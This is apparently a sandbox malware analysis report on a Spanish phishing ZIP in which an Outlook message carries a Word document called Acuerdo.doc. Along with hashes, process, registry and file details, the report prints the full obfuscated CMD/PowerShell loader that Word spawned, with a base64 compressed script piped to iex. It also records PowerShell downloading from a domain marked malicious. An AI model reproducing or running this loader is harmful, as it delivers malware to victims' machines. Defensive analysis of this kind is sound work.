File name: | Modificación de su tarifa de 07 noviembre 2018.zip |
Full analysis: | https://app.any.run/tasks/89f24b5b-3f5e-438a-baad-80153bc79541 |
Verdict: | Malicious activity |
Analysis date: | November 08, 2018, 14:34:43 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v5.1 to extract |
MD5: | 67A50DCB93DE4624D27109D2FB9DB394 |
SHA1: | 0282F149E6FB966719C9F8FDE9E32AF2B4704C14 |
SHA256: | 78B277F3F9ADFF6103B93D1EF354AF3D1BD54A3549263463F5DC3873DE6C1D32 |
SSDEEP: | 768:MhmzCZ+N3UmCKmvm33dt44KCbpO6M98VS3xQJ+N8jBnrnIxndQYDNfDPa0VY0:MgzC415Nm+ndt4tyOoVYCJ88BCyYNrCS |
.zip | | | ZIP compressed archive (100) |
---|
ZipFileName: | Modificaci?n de su tarifa de 07 noviembre 2018.msg |
---|---|
ZipUncompressedSize: | 112640 |
ZipCompressedSize: | 46960 |
ZipCRC: | 0x00000000 |
ZipModifyDate: | 2018:11:08 11:19:00 |
ZipCompression: | Unknown (99) |
ZipBitFlag: | 0x0001 |
ZipRequiredVersion: | 51 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3132 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Modificación de su tarifa de 07 noviembre 2018.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.60.0 | ||||
1404 | "C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" /f "C:\Users\admin\AppData\Local\Temp\Rar$DIb3132.21392\Modificación de su tarifa de 07 noviembre 2018.msg" | C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE | WinRAR.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Outlook Version: 14.0.6025.1000 | ||||
2248 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\IQA1S2F0\Acuerdo.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | OUTLOOK.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2552 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Embedding | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
3584 | CMD CMd.exE /c "SEt mfa=(NEw-objECT sYSTem.Io.strEAmrEaDer( ( NEw-objECT io.comPreSsioN.deflATEsTReam( [io.memOrySTReam][CONvERT]::froMBasE64stRIng( 'TZBRa4MwFIX/Sh4Caekaafuw0SCUdpS6dWPQje5hLxpvl9iYOI2mTvzvU2Hg6/2+c+BcvNsrX4ObmygBbtErWHqGaKckaMtwkux8IqzN1p7nnKMFmKKOKTepF9TvQq+CzYiWGdwogFf9fJRPq+39P0slF6CggjyWQ3YfQWEvv+Nslndcc2l0pspisLblsebLw/Nx7H1DnksrwjTUmsbgibdloOIXQk+ZknZCNmTK8EFw5COyWDwQhj+d8zHoam0hzWbki8x6PiMUbkDYxeQQcjHB5yRCUqN+8rSxed3g7jX00TitTBjvpYLBuUN94ZQFujJXmAdd6XBhUddzZS0PLRdN2/4B' ) ,[sYSTeM.io.cOMPrEssIon.cOMPRESSioNmoDe]::DecomPReSS )), [TeXt.EnCodinG]::asCIi)).rEadtOEnd() ^|iex&& PowERShEll $oK8 = [Type]( \"{3}{0}{2}{1}\"-f 'nVIR','nT','Onme','e') ; ${eXEcutIOnCoNTeXt}.\"In`VOKE`co`MmaNd\".(\"{1}{2}{0}\"-f 't','InvOK','EsCrIp' ).Invoke( ( ( ^& ( \"{0}{1}\"-f 'gC','i') ( \"V\" + \"aRI\"+\"abL\" + \"E:OK8\") ).\"v`Alue\"::( \"{5}{4}{3}{2}{1}{0}{6}\"-f'iAb','aR','MENTV','N','Ro','getENVI','lE').Invoke( 'mFa',(\"{0}{1}\" -f 'PROCe','SS' ) ) ))" | C:\Windows\system32\CMD.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3908 | PowERShEll $oK8 = [Type]( \"{3}{0}{2}{1}\"-f 'nVIR','nT','Onme','e') ; ${eXEcutIOnCoNTeXt}.\"In`VOKE`co`MmaNd\".(\"{1}{2}{0}\"-f 't','InvOK','EsCrIp' ).Invoke( ( ( & ( \"{0}{1}\"-f 'gC','i') ( \"V\" + \"aRI\"+\"abL\" + \"E:OK8\") ).\"v`Alue\"::( \"{5}{4}{3}{2}{1}{0}{6}\"-f'iAb','aR','MENTV','N','Ro','getENVI','lE').Invoke( 'mFa',(\"{0}{1}\" -f 'PROCe','SS' ) ) )) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | CMD.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
(PID) Process: | (3132) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes |
Operation: | write | Name: | ShellExtBMP |
Value: | |||
(PID) Process: | (3132) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes |
Operation: | write | Name: | ShellExtIcon |
Value: | |||
(PID) Process: | (3132) WinRAR.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E |
Operation: | write | Name: | LanguageList |
Value: en-US | |||
(PID) Process: | (3132) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
Operation: | write | Name: | 0 |
Value: C:\Users\admin\AppData\Local\Temp\Modificación de su tarifa de 07 noviembre 2018.zip | |||
(PID) Process: | (3132) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
Operation: | write | Name: | name |
Value: 120 | |||
(PID) Process: | (3132) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
Operation: | write | Name: | size |
Value: 80 | |||
(PID) Process: | (3132) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
Operation: | write | Name: | type |
Value: 120 | |||
(PID) Process: | (3132) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
Operation: | write | Name: | mtime |
Value: 100 | |||
(PID) Process: | (3132) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached |
Operation: | write | Name: | {0006F045-0000-0000-C000-000000000046} {000214FA-0000-0000-C000-000000000046} 0xFFFF |
Value: 0100000000000000E8806C3F7077D401 | |||
(PID) Process: | (3132) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached |
Operation: | write | Name: | {0006F045-0000-0000-C000-000000000046} {000214EB-0000-0000-C000-000000000046} 0xFFFF |
Value: 01000000000000009C45713F7077D401 |
PID | Process | Filename | Type | |
---|---|---|---|---|
1404 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\CVRC714.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1404 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\~DFF8830F60D757D89E.TMP | — | |
MD5:— | SHA256:— | |||
1404 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\IQA1S2F0\Acuerdo (2).doc\:Zone.Identifier:$DATA | — | |
MD5:— | SHA256:— | |||
2248 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRE913.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2248 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_4B655553-6188-4851-9352-C13634A63188.0\FDB1A2CB.doc\:Zone.Identifier:$DATA | — | |
MD5:— | SHA256:— | |||
2552 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_4B655553-6188-4851-9352-C13634A63188.0\~DF4DB202B38B5B47C7.TMP | — | |
MD5:— | SHA256:— | |||
3908 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\684T394A4R6GW8ZF2TS0.temp | — | |
MD5:— | SHA256:— | |||
3132 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DIb3132.21392\Modificación de su tarifa de 07 noviembre 2018.msg | msg | |
MD5:C56C3EC4365B0F78538DCDC56FBDCC5B | SHA256:F47B4AA140D8A5CBDF91BE059F2C8AA3AEB58A26CB2808D8260D137D716D8F2A | |||
1404 | OUTLOOK.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotm | pgc | |
MD5:0DC7158969B26FA940C1025CBAE11D2B | SHA256:B2C6B49B06913A6C99B155096DA546DADCE09344B5F0988F7A22C8D6705F2306 | |||
2248 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:4A53899C9316D0214DE360F42462362A | SHA256:99FFF3F4D07F6E400FA678CFAB626D7AED863D56CA61EF242FA4C79A2EB17823 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3908 | powershell.exe | GET | — | 69.163.156.184:80 | http://www.seosyd.com/IyThn3I | US | — | — | malicious |
1404 | OUTLOOK.EXE | GET | — | 64.4.26.155:80 | http://config.messenger.msn.com/config/msgrconfig.asmx?op=GetOlcConfig | US | — | — | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1404 | OUTLOOK.EXE | 64.4.26.155:80 | config.messenger.msn.com | Microsoft Corporation | US | whitelisted |
3908 | powershell.exe | 69.163.156.184:80 | www.seosyd.com | New Dream Network, LLC | US | malicious |
Domain | IP | Reputation |
---|---|---|
config.messenger.msn.com |
| whitelisted |
www.seosyd.com |
| malicious |